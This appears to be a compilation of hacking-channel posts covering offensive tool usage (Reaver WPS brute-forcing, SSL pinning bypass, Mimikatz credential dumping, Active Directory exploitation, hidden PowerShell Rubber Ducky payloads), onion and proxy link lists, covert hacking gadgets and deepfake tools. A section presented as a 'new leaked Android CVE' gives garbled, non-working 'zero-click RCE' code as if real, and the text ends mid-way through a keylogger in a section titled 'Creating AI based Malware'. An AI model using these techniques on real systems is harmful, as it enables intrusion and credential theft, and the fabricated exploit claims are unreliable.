🦑 Tool: OWASP ZAP - Zed Attack Proxy

OWASP ZAP (Zed Attack Proxy) is an open-source web application security scanner. It is used to identify vulnerabilities in web applications through automated scanning and manual testing. ZAP helps detect issues like SQL injection, cross-site scripting (XSS), and more.

---

### Basic Usage Command:
1. Start OWASP ZAP by running the following command (after installing it):

zap.sh

Explanation:
- zap.sh: Launches the OWASP ZAP application from the command line.

---

### Example: Automated Scan Using ZAP's API

zap-cli quick-scan -u http://example.com

Explanation:
- zap-cli quick-scan: Initiates a quick scan of the web application.
- -u http://example.com: Specifies the target URL to be scanned.

---

### Example: Start ZAP in Headless Mode for Automation

zap.sh -daemon -port 8080 -host 127.0.0.1

Explanation:
- -daemon: Starts ZAP in headless (non-GUI) mode, which is suitable for automation.
- -port 8080: Sets the port for the ZAP proxy to listen on (default is 8080).
- -host 127.0.0.1: Sets the host address to localhost.

---

### Example: Scan with Specific Context

zap-cli spider -c -u http://example.com

Explanation:
- spider: Crawls the target website to discover pages.
- -c: Continues crawling from any previously discovered URLs.
- -u http://example.com: The URL to start the crawl from.

---

### Important Notes:
1. OWASP ZAP is highly customizable and can be extended with a variety of plugins to enhance its functionality.
2. It's great for both beginners and experienced penetration testers, thanks to its automated scanning and manual testing features.
3. Ensure you have authorization to test the application before running ZAP on a target website.

🦑 Tool: SSLUnpinning - SSL Pinning Bypass Tool for Android

SSLUnpinning is a tool designed to bypass SSL pinning on Android applications. SSL pinning is a security technique that prevents man-in-the-middle (MITM) attacks by ensuring that the client only trusts a predefined certificate or public key. SSLUnpinning helps in bypassing this mechanism during security assessments or penetration testing.

---

### Basic Usage Command:
To use SSLUnpinning, you typically need to decompile the APK, patch it, and then recompile it. Here's the general approach:

1. Decompile the APK (using tools like APKTool or jadx):

   apktool d app.apk
   

2. Patch the APK with SSLUnpinning:
- Use the provided SSLUnpinning script or modify the decompiled code to disable SSL pinning manually.

3. Recompile the APK:

   apktool b app -o app_modified.apk
   

4. Sign the APK (to ensure it can be installed on a device):

   jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.jks app_modified.apk alias_name
   

5. Install the patched APK:

   adb install app_modified.apk
   

---

### Important Notes:
- SSL Pinning Bypass is useful when testing applications for vulnerabilities but can only be performed if you have authorization to do so.
- Repackaging and patching APKs may break other functionality or be detected by the application if additional protections are in place.

🦑 Tool: Reaver - WPS PIN Brute-Forcing Tool

Reaver is a powerful tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) to recover the PIN used for authentication in wireless routers. It allows attackers to brute-force the WPS PIN and gain access to the target network.

---

### Basic Usage Command:

reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv

Explanation:
- reaver: Runs the Reaver tool.
- -i wlan0: Specifies the wireless network interface to use (replace wlan0 with your network interface name).
- -b XX:XX:XX:XX:XX:XX: Specifies the target router's BSSID (MAC address).
- -vv: Enables verbose output to display more information during the attack.

---

### Example: Specify a WPS PIN to Brute-Force

reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -p 12345670 -vv

Explanation:
- -p 12345670: Attempts a specific WPS PIN, instead of brute-forcing the entire PIN.
- -vv: Provides detailed output for monitoring progress.

---

### Example: Save Results to a File

reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv -o /path/to/output.txt

Explanation:
- -o /path/to/output.txt: Saves the output to a specified file for later analysis.

---

### Important Notes:
1. Reaver works only on routers with WPS enabled, and the attack may take several hours to complete depending on the router's implementation of WPS.
2. Legal Considerations: Always ensure that you have explicit permission to perform wireless network penetration testing on the target system. Unauthorized use of Reaver is illegal.

🦑The New Leaked Android CVE:

Android System Server RCE:
The Android System Server is responsible for managing system services and processes. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level.

Deployment and Execution
Build the malicious dex file using the dx tool from the Android SDK:

dx --dex --output=myexploit.dex myexploit.class

Create a new APK that includes the malicious dex file and any required dependencies:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.androidexploit">

<application>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>

</manifest>
Sign the APK with a valid signing certificate:

jarsigner -verbose -keystore mykeystore.keystore SysIntel.apk SysIntell

Install the signed APK on a vulnerable device.
Why it Works
The Android System Server is responsible for managing system services and processes, including the package manager. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level, gaining full control over the device.

Custom Zero-Click Exploit: Android Package Manager Service (PackageManagerService)
Create a custom zero-click exploit that targets a vulnerability in the Android Package Manager Service (PackageManagerService). This service is responsible for managing application installations and updates. Your exploit should allow an attacker to execute arbitrary code with system privileges.

Exploit Code
import android.content.pm.PackageParser;
import android.os.Build;
import android.os.Bundle;
import dalvik.system.DexClassLoader;

public class MainActivity extends androidx.appcompat.app.AppCompatActivity {

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

// Load the malicious dex file
String[] paths = getPackageCodePath().split(" ");
DexClassLoader cl = new DexClassLoader(paths, getPackageCodePath(), null, getClass().getClassLoader());

// Invoke the RCE method from the dex file
try {
Method m = cl.loadClass("com.example.malicious.Malware").getDeclaredMethod("executeRCE", String.class);
m.invoke(null, "Hello, Android!");
} catch (Exception e) {
e.printStackTrace();
}
}
}
How to Run
Build the malicious dex file using the dx tool from the Android SDK:

dx --dex --output=myexploit.dex myexploit.class
Create a new APK that includes the malicious dex file and any required dependencies.

Sign the APK with a valid signing certificate.

Install the signed APK on a vulnerable device.

🦑 Here are the URLs for the extended list of free proxy sites:

1. CroxyProxy
https://www.croxyproxy.com

2. TurboHide
https://www.turbohide.com

3. VPNBook
https://www.vpnbook.com/webproxy

4. FilterBypass
https://www.filterbypass.me

5. Hidester
https://hidester.com/proxy/

6. Mywebproxy
https://mywebproxy.com/

7. Proxyium
https://proxyium.com

8. Anonymizing
https://anonymizing.com/

9. NetNut
https://www.netnut.io/

10. Plain Proxies
https://www.plainproxies.com/

🦑Dark Web Websites (Updated) :

http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/ – DanielWin
http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/ – Hidden Answers
https://kcmykvkkt3umiyx4xouu3sjo6odz3rolqphy2i2bbdan33g3zrjfjgqd.onion/ – aboutMastodon
http://dhosting4xxoydyaivckq7tsmtgi4wfs3flpeyitekkmqwu4v4r46syd.onion/ – Daniels Hosting
http://cathug2kyi4ilneggumrenayhuhsvrgn6qv2y47bgeet42iivkpynqad.onion/ – cathugger’s site
http://zgeajoabenj2nac6k5cei5qy62iu5yun5gm2vjnxy65r3p3amzykwxqd.onion/ – Darkweb Blog
http://ozmh2zkwx5cjuzopui64csb5ertcooi5vya6c2gm4e3vcvf2c2qvjiyd.onion/ – riseup searx
http://45tbhx5prlejzjgn36nqaxqb6qnm73pbohuvqkpxz2zowh57bxqawkid.onion/ – Parckwart’s Website
http://sidignlwz2odjhgcfhbueinmr23v5bubq2x43dskcebh5sbd2qrxtkid.onion/ – securejabber
http://sik5nlgfc5qylnnsr57qrbm64zbdx6t4lreyhpon3ychmxmiem7tioad.onion/ – Qubes OS
http://dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/ – Whonix
http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/ – OnionShare

http://nanochanqzaytwlydykbg5nxkgyjxk3zsrctxuoxdmbx5jbh2ydyprid.onion/ – NanoChan

http://picochanwvqfa2xsrfzlul4x4aqtog2eljll5qnj5iagpbhx2vmfqnid.onion/ – PicoChan

http://enxx3byspwsdo446jujc52ucy2pf5urdbhqw3kbsfhlfjwmbpj5smdad.onion/ – EndChan

http://dngtk6iydmpokbyyk3irqznceft3hze6q6rasrqlz46v7pq4klxnl4yd.onion/ – 256Chan

http://cct5wy6mzgmft24xzw6zeaf55aaqmo6324gjlsghdhbiw5gdaaf4pkad.onion/ – Snopyta

http://wnrgozz3bmm33em4aln3lrbewf3ikxj7fwglqgla2tpdji4znjp7viqd.onion/ – VYempire.xyz

http://7sk2kov2xwx6cbc32phynrifegg6pklmzs7luwcggtzrnlsolxxuyfyd.onion/ – SystemLI.org

http://stormwayszuh4juycoy4kwoww5gvcu2c4tdtpkup667pdwe4qenzwayd.onion/ – CryptoStorm VPN

http://xdkriz6cn2avvcr2vks5lvvtmfojz2ohjzj4fhyuka55mvljeso2ztqd.onion/ – Cock.li

http://eludemailxhnqzfmxehy3bk5guyhlxbunfyhkcksv4gvx6d3wcf6smad.onion/ – Elude.in

http://lainwir3s4y5r7mqm3kurzpljyf77vty2hrrfkps6wm4nnnqzest4lqd.onion/ – qord11.net

http://cgjzkysxa4ru5rhrtr6rafckhexbisbtxwg2fg743cjumioysmirhdad.onion/ – Course Enigma

http://killnod2s77o3axkktdu52aqmmy4acisz2gicbhjm4xbvxa2zfftteyd.onion/ – Kill9

http://digdeep4orxw6psc33yxa2dgmuycj74zi6334xhxjlgppw6odvkzkiad.onion/ – DigDeeper

http://spywaredrcdg5krvjnukp3vbdwiqcv3zwbrcg6qh27kiwecm4qyfphid.onion/ – Spyware Watchdog

http://meynethaffeecapsvfphrcnfrx44w2nskgls2juwitibvqctk2plvhqd.onion/ – May Vane Day Studios

http://zsxjtsgzborzdllyp64c6pwnjz5eic76bsksbxzqefzogwcydnkjy3yd.onion/ – Shadow Wiki

http://g7ejphhubv5idbbu3hb3wawrs5adw7tkx7yjabnf65xtzztgg4hcsqqd.onion/ – Defcon

http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/ – Propublica

http://darkzzx4avcsuofgfez5zq75cqc4mprjvfqywo45dfcaxrwqg6qrlfid.onion/ – Darknetlive

http://keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion/ – KeyBase.IO

http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/ – CIA.GOV

http://archivebyd3rzt3ehjpm4c3bjkyxv3hjleiytnvxcn7x32psn2kxcuid.onion/ – Internet Archive

http://bible4u2lvhacg4b3to2e2veqpwmrc2c3tjf2wuuqiz332vlwmr4xbad.onion/ – Bible4u

http://kx5thpx2olielkihfyo4jgjqfb7zx7wxr3sd4xzt26ochei4m6f7tayd.onion/ – Imperial Library

http://nv3x2jozywh63fkohn5mwp2d73vasusjixn3im3ueof52fmbjsigw6ad.onion/ – Comic Books

🎩 If you want to learn CYBERSECURITY for FREE, this THREAD is for you.

📝Here are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.
👇👇👇

If you want to learn CYBERSECURITY for FREE, this THREAD is for you.

📝Here are Loads of FREE RESOURCES (Courses, Certifications, Communities, Internship opportunities) to get you STARTED.

1. Cisco CCNA Cyber Ops Associate 200-201 - MEGA
🔗mega.nz/folder/B4A0WDZ…

2. Cybersecurity FULLY LOADED by Simplilearn
🔗https://lnkd.in/eddq3rXW

3. Cybersecurity FULL course by EDUREKA
🔗https://lnkd.in/eK_dZFUi

4. Awesome Cybersecurity University
🔗https://lnkd.in/er-MAK2q

5. Cybersecurity books for beginners
🔗https://lnkd.in/ecBzr_Sn

6. Cybersecurity Documents
🔗https://lnkd.in/ecBzr_Sn

Cyber Security Courses for beginners and professionals

📌 Core:
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
AWS Cloud - lnkd.in/e_auX7VE
Azure Cloud - lnkd.in/eCq_dvDq
GCP Cloud - lnkd.in/eDNWnVsD

📌 Fundamentals:
SANS Aces - lnkd.in/eNCPrtdd
ISC(2) Certified in Cyber - lnkd.in/e6jB_6af
Coursera - lnkd.in/ePMNVDm5
EC-Council - lnkd.in/ewiVUkYt
Cyber Security - lnkd.in/eueCSF6A
Cisco Cyber Induction - lnkd.in/e8C3jacc
Cisco Cyber Essentials - lnkd.in/eTQNsbyF
Cisco Network Essentials - lnkd.in/eMXxFBPN
Palo Alto - lnkd.in/ebz4VZmQ
Fortinet NSE - lnkd.in/es3c_Q6E

📌 Penetration Testing:
TCM-Security - lnkd.in/eJQKmhnt
PortSwigger Web Hacking - lnkd.in/eEa-fNfu
CodeRed Hacking Essentials - lnkd.in/eJbyZp_9
RedTeaming - lnkd.in/et_T2DEa
METASPLOIT UNLEASHED - lnkd.in/eJFcNSsz
Hacker101 - lnkd.in/eJK5xp2A

📌 Vulnerability Management:
Qualys - lnkd.in/eDWu2zyT
Tenable (Intro) - lnkd.in/eQW2Zjjj
Class Central - lnkd.in/eWbmXfRU

📌 SIEM:
Splunk - lnkd.in/e5ZVAEuF
QRadar - lnkd.in/ebjbyq_x
Elastic - lnkd.in/e-jXsnVs
XPERT - lnkd.in/eYR7r3uD

📌 Engineering:
Oxford - lnkd.in/eJHp7Dp2
IoT Privacy - lnkd.in/eN5xDUed

🦑 XXH - Cross-Site Hacking (XXH)

XXH is a tool used for exploiting vulnerabilities in cross-site scripting (XSS) attacks in web applications. It can be used to automate attacks and demonstrate how an attacker can inject malicious scripts into a website.


### Basic Usage Command:

xxh -u http://example.com

Explanation:
- xxh: Runs the XXH tool.
- -u http://example.com: Specifies the target URL to test for XSS vulnerabilities.

---

### Example: Test for Specific XSS Payloads

xxh -u http://example.com -p "<script>alert('XSS')</script>"

Explanation:
- -u http://example.com: Specifies the target URL.
- -p "<script>alert('XSS')</script>": Provides a specific payload to test the application for a potential XSS vulnerability.

---

### Important Notes:
1. Authorization: Always ensure you have explicit permission to test a website for XSS vulnerabilities, as unauthorized testing is illegal.
2. Payloads: XXH can help automate the process of injecting a variety of XSS payloads into vulnerable parameters in web applications.
3. Testing: This tool is best used to identify and demonstrate XSS vulnerabilities, which could allow an attacker to steal sensitive data like cookies, session IDs, or other information.

🦑Top Free DeepFake Labs:

1. DeepFaceLab
- Overview: One of the most popular open-source deepfake tools, DeepFaceLab allows you to create high-quality deepfake videos, but it requires significant technical skills.
- Features: High level of customization, support for face-swapping, training, and exporting videos.
- Platform: Windows (requires installation).
- Cost: Free (but with a steep learning curve).

[DeepFaceLab GitHub](https://github.com/iperov/DeepFaceLab)

2. FaceSwap
- Overview: Another open-source deepfake tool, FaceSwap offers similar capabilities to DeepFaceLab, with a slightly easier user interface.
- Features: Face swapping, training models, video creation, and a large community for troubleshooting.
- Platform: Windows, Linux, macOS.
- Cost: Free.

[FaceSwap GitHub](https://github.com/deepfakes/faceswap)

3. Zao
- Overview: Zao is a popular deepfake app that lets users swap faces in short video clips. It's quite easy to use and doesn't require any technical expertise.
- Features: Instant face swapping in videos, easy-to-use mobile app.
- Platform: iOS, Android.
- Cost: Free (though there might be in-app purchases or ads).

[Zao on App Store](https://apps.apple.com/us/app/zao/id1468717386)

4. Reface (formerly Doublicat)
- Overview: Reface is a mobile app that allows users to swap faces in GIFs, images, and videos. It provides high-quality face-swapping, making it popular for meme creation.
- Features: Instant face swap in videos, GIFs, and photos.
- Platform: iOS, Android.
- Cost: Free, with a premium version offering additional features.

[Reface on App Store](https://apps.apple.com/us/app/reface/id1480262143)
[Reface on Google Play](https://play.google.com/store/apps/details?id=com.reface.app)

5. DeepArt.io
- Overview: While not specifically for deepfakes, DeepArt.io allows users to transform their photos into stylized artworks using AI. Some users have experimented with face-swapping features.
- Features: AI-based art transformation, face-swapping capabilities.
- Platform: Web.
- Cost: Free for basic features.

[DeepArt.io](https://deepart.io/)

6. FaceApp
- Overview: A very popular app for aging, gender-swapping, and face enhancement. While not a traditional deepfake tool, it leverages AI for impressive transformations of faces in photos.
- Features: Aging, gender swap, facial expressions, makeup, and more.
- Platform: iOS, Android.
- Cost: Free with in-app purchases.

[FaceApp on App Store](https://apps.apple.com/us/app/faceapp/id1180881432)
[FaceApp on Google Play](https://play.google.com/store/apps/details?id=io.faceapp&hl=en&gl=US)

7. MyHeritage Deep Nostalgia
- Overview: A fun tool that animates old photos, bringing them to life by making them appear as if they're moving. It uses deepfake-like technology but focuses on historic photos.
- Features: Animation of photos (facial expressions and movements).
- Platform: Web, iOS, Android.
- Cost: Free trial, but the full functionality may require a subscription.

[MyHeritage Deep Nostalgia](https://www.myheritage.com/deep-nostalgia)

8. Fotor (Deepfake Filters)
- Overview: Fotor offers AI-powered editing tools, including face swapping and other deepfake-style effects, allowing users to alter facial features in photos.
- Features: Face-swapping filters, AI-generated photo enhancements.
- Platform: Web, iOS, Android.
- Cost: Free with premium options.

[Fotor](https://www.fotor.com/)

Important Considerations:
- Ethical Use: Always be cautious when using deepfake tools, as they can be used for harmful purposes such as misinformation, identity theft, or defamation.
- Legal Restrictions: In many regions, the creation and distribution of deepfakes, particularly without consent, may be illegal or lead to legal repercussions.

These websites and apps offer free tools for experimenting with AI-based face manipulation, but they each come with limitations in functionality and output quality.

🦑 Autopsy - Digital Forensics Platform

Autopsy is an open-source digital forensics platform used for analyzing hard drives, smartphones, and other digital storage devices. It provides a user-friendly interface for examining file systems, extracting evidence, and generating forensic reports, making it a valuable tool for investigating cybercrimes and incidents.

---

### Basic Usage Command:
To start Autopsy from the command line:

autopsy

Explanation:
- autopsy: Launches the Autopsy graphical user interface (GUI) for forensic analysis.

---

### Example: Create a New Case

autopsy -c new_case -d /path/to/image.dd

Explanation:
- -c new_case: Creates a new forensic case.
- -d /path/to/image.dd: Specifies the disk image to analyze, which could be a raw disk image, an E01 file, or other supported formats.

---

### Example: Analyze File System and Evidence
Once the case is created, you can use Autopsy to analyze file systems, perform keyword searches, recover deleted files, and generate reports through its GUI. However, you can also perform some basic tasks like viewing the file structure or checking logs from the command line interface (CLI).

---

### Important Notes:
1. Case Handling: Autopsy can be used to handle multiple cases simultaneously, making it efficient for forensic investigations with large amounts of evidence.
2. Extensive Plugin Support: Autopsy supports a wide range of plugins that allow integration with other tools like Sleuth Kit (TSK), a popular set of command-line forensic tools.
3. Legal Considerations: Always make sure you have permission to perform forensic analysis, as unauthorized analysis of digital devices may be illegal.

🦑 Top Hacking gadgets frequently used by cybersecurity professionals, ethical hackers, and enthusiasts, along with their official or well-known sources:

1. Raspberry Pi - A versatile single-board computer used for penetration testing and running tools like Kali Linux.
URL: [www.raspberrypi.com](https://www.raspberrypi.com)

2. WiFi Pineapple - A device for wireless penetration testing, including rogue access points and deauth tests.
URL: [shop.hak5.org](https://shop.hak5.org)

3. HackRF One - A software-defined radio for analyzing and manipulating radio frequencies.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)

4. Ubertooth One - Used for Bluetooth experimentation and packet sniffing.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)

5. Deauther Watch - A wearable device for Wi-Fi deauthentication attacks.
URL: [dstike.com](https://dstike.com)

6. USB Rubber Ducky - A keystroke injection tool that executes predefined attack scripts.
URL: [shop.hak5.org](https://shop.hak5.org)

7. Flipper Zero - A multi-tool for interacting with digital systems like RFID and GPIO debugging.
URL: [flipperzero.one](https://flipperzero.one)

8. ChameleonMini - An RFID emulator for NFC security analysis and penetration testing.
URL: [chameleontiny.com](https://chameleontiny.com)

9. O.MG Cable - A USB cable capable of injecting payloads and acting as a keylogger.
URL: [shop.hak5.org](https://shop.hak5.org)

10. HakCat WiFi Nugget - A tool for learning Wi-Fi hacking with a playful design.
URL: [github.com/HakCat](https://github.com/HakCat)

11. Hardware Keylogger - A physical device for recording keystrokes.
URL: [keydemon.com](https://keydemon.com)

12. LAN Turtle - A covert hacking tool disguised as a USB-to-Ethernet adapter.
URL: [shop.hak5.org](https://shop.hak5.org)

13. Proxmark3 - Used for RFID research, cloning, and penetration testing.
URL: [proxmark.org](https://proxmark.org)

14. Rubber Glove (Covert Device) - A disguised tool for capturing sensitive information.
URL: Search online for specific retailers.

Let me know if you'd like an6 extended list or details about a specific gadget!

🦑 Active Directory Exploitation Cheat Sheet - AD Enumeration and Exploitation

The Active Directory Exploitation Cheat Sheet by [S1ckB0y1337](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) is a comprehensive collection of enumeration and attack methods for Windows Active Directory environments. This resource is ideal for penetration testers and red teamers focusing on AD security.

---

### GitHub Repository:
[Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)

---

### Commands and Usage Examples:

#### 1. Domain Enumeration
Using PowerView:

# Get current domain details
Get-Domain

# Enumerate domain users
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt

# Enumerate domain controllers
Get-DomainController

---

#### 2. Lateral Movement
Using PowerShell Remoting:

# Enable remoting
Enable-PSRemoting -Force

# Invoke a remote command
Invoke-Command -ComputerName <TargetComputer> -ScriptBlock {Get-Process}

---

#### 3. Privilege Escalation
Using Kerberoasting:

# Find SPNs for Kerberoasting
Get-DomainUser -SPN

Exported SPNs can then be cracked using tools like Rubeus or Hashcat.

---

#### 4. Credential Dumping
Using Mimikatz:

# Launch Mimikatz
mimikatz.exe

# Dump credentials
privilege::debug
lsadump::sam

---

### Popular Features:
1. User Hunting: Locate where privileged users have active sessions:

   Find-DomainUserLocation
   

2. Enumeration of Group Policies:

   Get-DomainGPO | Sort-Object -Property DisplayName
   

3. Abusing ACLs for Privilege Escalation:

   Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
   

---

### Notable Tools Integrated:
- PowerView: Active Directory enumeration.
- BloodHound: AD attack path analysis.
- Mimikatz: Credential dumping.
- Impacket: Exploitation toolkit.

---

### Key Use Cases:
1. Enumeration: Map out users, computers, and domain trust relationships.
2. Privilege Escalation: Exploit Kerberoasting, constrained delegation, or DNSAdmins.
3. Lateral Movement: Execute remote commands and pivot across systems.
4. Persistence: Set up Golden Tickets or Skeleton Keys.

This cheat sheet is an essential resource for systematically targeting and exploiting Active Directory. Use it responsibly and within legal boundaries!

🦑 USB Rubber Ducky Payload

The [USB Rubber Ducky Payload Repository](https://github.com/hak5/usbrubberducky-payloads) by Hak5 provides a collection of ready-to-use payloads for the USB Rubber Ducky—a keystroke injection tool often used for penetration testing and red teaming. These payloads simulate fast and stealthy input for various exploits and tasks.

---

### GitHub Repository:
[Hak5 USB Rubber Ducky Payloads](https://github.com/hak5/usbrubberducky-payloads)

---

### Example Payload Structure:

#### Payload Documentation
All payloads start with comments that describe their purpose, author, target, and configuration.

REM Title: Example Payload
REM Author: Korben Dallas
REM Description: Opens hidden PowerShell
REM Target: Windows 10
REM Props: Hak5, Darren Kitchen
REM Version: 1.0
REM Category: General

---

#### Payload Example: URL Opening Script
This payload opens a URL after a brief delay.

BEGINNING OF PAYLOAD

REM CONFIGURATION
REM REQUIRED - Provide URL
DEFINE #MY_TARGET_URL example.com

REM OPTIONAL - Set boot delay; default is 5 seconds
DEFINE #BOOT_DELAY 5000

DELAY #BOOT_DELAY

STRING start chrome.exe #MY_TARGET_URL
ENTER

---

### Features:
1. Preconfigured Payloads:
- Password exfiltration
- Reverse shells
- Network reconnaissance
- Drive-by downloads

2. Customizable Payloads:
- DEFINE statements for reusable parameters.
- DELAY statements to time operations precisely.

3. Cross-Platform Targeting:
- Payloads can be customized for Windows, macOS, and Linux.

---

### Key Payload Categories:
1. Information Gathering:
- Automated reconnaissance.
- Exporting network details.

2. Exploitation:
- Privilege escalation.
- Exploiting vulnerabilities via automated commands.

3. Post-Exploitation:
- Extracting data or installing backdoors.

4. Social Engineering:
- Simulating user activity or spoofing actions.

---

### Notable Use Case:
#### Hidden PowerShell Script Execution

REM Title: Hidden PowerShell Execution
REM Author: Hak5
REM Description: Launches a hidden PowerShell instance.
REM Target: Windows 10
REM Category: Post-Exploitation

DELAY 5000
STRING powershell -windowstyle hidden
ENTER

---

### Usage:
1. Select a payload from the repository.
2. Edit the payload as per your target's configuration.
3. Load the payload onto the USB Rubber Ducky.
4. Deploy and execute the payload by plugging it into the target system.

This repository is a must-have for penetration testers aiming to automate tasks, test security defenses, or explore advanced attack vectors. Ensure proper authorization when using these tools.

🦑Game changer. Microsoft open-sourced bitnet.cpp, you can now run 100B LLMs locally without a GPU needed.

The framework quantizes LLMs to 1-bit precision and runs inference directly on CPUs, making large language models accessible on standard hardware.

Technical details:
▸ Forked from llama.cpp with optimizations for 1-bit inference
▸ Handles models up to 100B parameters locally
▸ Achieves 6.17x speedup compared to standard inference
▸ Reduces energy consumption by 82.2%
▸ Works on standard CPUs without specialized hardware

Repo: https://lnkd.in/guEhH8ad
↓
Are you an AI developer? Check out https://AlphaSignal.ai to get a daily summary of breakthrough models, repos and papers in AI. Read by 200,000+ devs.

🦑Monitoring: BloodHound is a powerful tool for analyzing and visualizing Active Directory environments. It assists penetration testers and system administrators in identifying weak permissions, potential attack paths, and privilege escalation opportunities within a Windows domain.

---

### GitHub Repository:
[BloodHound GitHub](https://github.com/BloodHoundAD/BloodHound)

---

### Features:
1. Active Directory Enumeration:
- Maps domain trust relationships.
- Identifies paths to high-value targets like Domain Admins.
- Highlights risky ACLs and misconfigurations.

2. Graph Visualization:
- Displays a clear graph of domain objects and their relationships.
- Uses queries to highlight exploitable paths and vulnerabilities.

3. Neo4j Database Integration:
- Stores collected AD data for analysis.
- Allows querying via Cypher language for complex insights.

4. Cross-Platform Support:
- Runs on Windows, macOS, and Linux.

---

### Use Cases:
1. Privilege Escalation:
- Identifies attack paths from low-privileged users to domain administrators.

2. Lateral Movement:
- Maps routes through machines, groups, and users for lateral traversal.

3. Audit & Mitigation:
- Assists administrators in identifying weak spots and tightening security.

---

### How It Works:
1. Data Collection:
Use SharpHound, the data collector, to gather information from the domain.

Example:

   SharpHound.exe -c All
   

This collects data about users, groups, permissions, trusts, and ACLs.

2. Data Import:
Import the collected JSON files into BloodHound.

3. Querying:
Use predefined or custom Cypher queries to identify attack paths.

Example Query:

   MATCH (n:User {name:"John"})-[r:AdminTo]->(m:Computer) RETURN n,m
   

This finds all computers where "John" has administrative rights.

---

### Visualization Example:
A graphical representation might show:
- Nodes: Users, groups, computers, and domains.
- Edges: Relationships like group memberships, session hosts, and admin rights.

---

### Installation:
1. Neo4j Database:
- Download and install from [Neo4j](https://neo4j.com/).
- Start the database service.
2. BloodHound:
- Clone the repository or download the release binaries.
- Run the BloodHound GUI.

---

### Additional Tools:
- SharpHound: Data collection tool for Windows environments.
- AzureHound: Gathers data for Azure AD.

This tool is essential for auditing AD security and simulating attacker behavior in penetration testing engagements.

🦑 all-in-one toolkit Scanners-Box

Description: Scanners-Box is an all-in-one toolkit that consolidates various scanning utilities for penetration testers, security analysts, and system administrators. It helps with network reconnaissance, vulnerability assessment, and information gathering. The framework simplifies the management and execution of multiple scanning tools in a unified environment.

---

### GitHub Repository:
[Scanners-Box GitHub](https://github.com/We5ter/Scanners-Box)

---

### Features:
1. Comprehensive Scanning Tools:
- Includes tools for port scanning, vulnerability assessment, subdomain enumeration, and more.
- Aggregates commonly used scanners like Nmap, Nikto, and masscan.

2. Modular Design:
- Flexible configuration allows adding custom tools and scripts.
- Easily integrates new scanning functionalities.

3. Automation:
- Automates repetitive scanning tasks.
- Batch scanning capabilities for multiple targets.

4. Cross-Platform Support:
- Works on Windows, Linux, and macOS systems.

5. Custom Scripts:
- Leverages Python and bash scripts for tailored tasks.

---

### Use Cases:
1. Port and Service Scanning:
- Quickly identify open ports and running services on target systems.

2. Subdomain Enumeration:
- Gather subdomains and perform DNS resolution checks.

3. Web Server Vulnerability Scanning:
- Analyze web servers for known vulnerabilities using integrated tools like Nikto.

4. Network Reconnaissance:
- Map out networks and identify potential entry points for further exploitation.

5. Vulnerability Assessment:
- Assess the security posture of networks and web applications.

---

### Key Tools Included:
1. Port Scanners:
- Nmap
- masscan
- unicornscan

2. Vulnerability Scanners:
- Nikto
- OpenVAS
- wapiti

3. Web Application Scanners:
- w3af
- Arachni
- Burp Suite integration

4. Subdomain Enumeration:
- Sublist3r
- Amass
- assetfinder

5. DNS and OSINT:
- dnsenum
- theHarvester

---

### Installation:
1. Clone the repository:

   git clone https://github.com/We5ter/Scanners-Box.git
   

2. Navigate to the directory:

   cd Scanners-Box
   

3. Run the setup script:

   bash install.sh
   

---

### Example Usage:
- Subdomain Scanning:

  python3 subdomain.py --target example.com
  

- Port Scanning with Nmap:

  python3 nmap_scan.py --target 192.168.1.1
  

- Vulnerability Scanning:

  python3 nikto_scan.py --target example.com
  

---

### Advantages:
- Consolidates multiple tools in one framework.
- Reduces setup time for scanning tasks.
- Easily customizable and extendable.

This toolkit is invaluable for quickly setting up comprehensive scans in penetration testing and vulnerability assessment workflows.

Automated Collection of Vulnerabilities and Their Fixes from Open-Source Software

https://github.com/secureIT-project/CVEfixes

🦑 Creating AI based Malware

Creating and Solving Challenges with AI Safeguards

Before proceeding, it's crucial to highlight that creating malware, participating in malicious activities, or circumventing ethical guidelines is against responsible and lawful use of technology.


### Step-by-Step Approach to Solve AI-based s

#### 1. Understand the Challenge Context:
- Category: Identify if it's reverse engineering, binary exploitation, web exploitation, cryptography, or malware analysis.
- Analyze the Objective: Read the challenge carefully to determine what needs to be achieved (e.g., decode, extract, or manipulate).

#### 2. Leverage AI for Analysis:
Use AI-based tools to analyze or automate repetitive tasks:
- Binary Analysis: Use frameworks like Ghidra or Radare2 for reverse engineering.
- Automate Patterns: Leverage Python with AI libraries like OpenAI or TensorFlow for pattern recognition or automated testing.

#### 3. Code Malware-like Behavior (Legally for Educational Purposes):
When solving a , you may encounter situations mimicking malware functionality:
- Payload Analysis: Decrypt encoded payloads using tools like CyberChef.
- Code Automation:
- Example: Create a keylogger (for analysis, NOT deployment):

       from pynput import keyboard

       def on_press(key):
           try:
               print(f"Key {key.char} pressed")
           except AttributeError:
